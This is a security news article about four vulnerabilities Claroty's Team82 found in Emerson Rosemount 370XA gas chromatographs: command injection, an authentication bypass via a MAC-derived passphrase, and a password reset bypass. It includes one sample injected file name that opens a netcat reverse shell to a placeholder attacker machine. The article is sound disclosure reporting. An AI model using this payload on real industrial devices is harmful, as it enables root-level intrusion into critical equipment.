Multiple critical vulnerabilities in Emerson gas chromatographs could allow malicious actors access to sensitive data, cause denial-of-service conditions and execute arbitrary commands.
Gas chromatographs, used to analyze and separate chemical compounds, are integral tools in several industries, including the chemical, environmental and healthcare sectors.
The Emerson Rosemount 370XA, a widely used model, relies on a proprietary protocol for communication between the device and the technician's computer.
Security researchers at operational technology security firm Claroty's Team82 identified four key vulnerabilities: two command injection flaws, an authentication bypass and an authorization vulnerability.
One command injection flaw received a CVSS v3 score of 9.8, indicating its critical severity.
The vulnerability is linked to a system function that is called with a constructed shell command and includes a user-provided file name, without proper sanitization.
This enables an attacker to inject arbitrary shell commands.
The attacker can exploit this by supplying a crafted input such as gunzip -c ;nc -e /bin/sh ATTACKER MACHINE 1337;> name of the expanded file, which results in arbitrary code execution in the context of the root shell.
Another vulnerability, tracked as CVE-2023-51761, is an authentication bypass vulnerability that allows an attacker to bypass authentication by calculating a secret passphrase to reset the administrator password.
The passphrase is derived from the device's MAC address, which is not secret information and can be easily obtained.
The vulnerability tracked as CVE-2023-49716 is a user login bypass via a password reset mechanism.
This vulnerability enables an unauthenticated user with network access to bypass authentication and acquire admin capabilities.
The last vulnerability addressed is tracked as CVE-2023-43609 and is a command injection via reboot functionality.
This flaw allows an authenticated user with network access to run arbitrary commands from a remote computer.
Because of the high cost and difficulty of obtaining a physical device, the researchers emulated the Emerson Rosemount 370XA for their analysis.
They identified flaws in the device's protocol implementation, allowing them to craft payloads and uncover the vulnerabilities.
The authentication bypass vulnerability enabled attackers to calculate a secret passphrase and reset administrator passwords, compromising system security.
Emerson in a security advisory recommended that end users update the firmware on the products.
The Cybersecurity and Infrastructure Security Agency has also released an advisory concerning the flaws.
Covering topics in risk management, compliance, fraud, and information security.
This Cyber News was published on www.bankinfosecurity.com. Publication date: Mon, 01 Jul 2024 12:43:04 +0000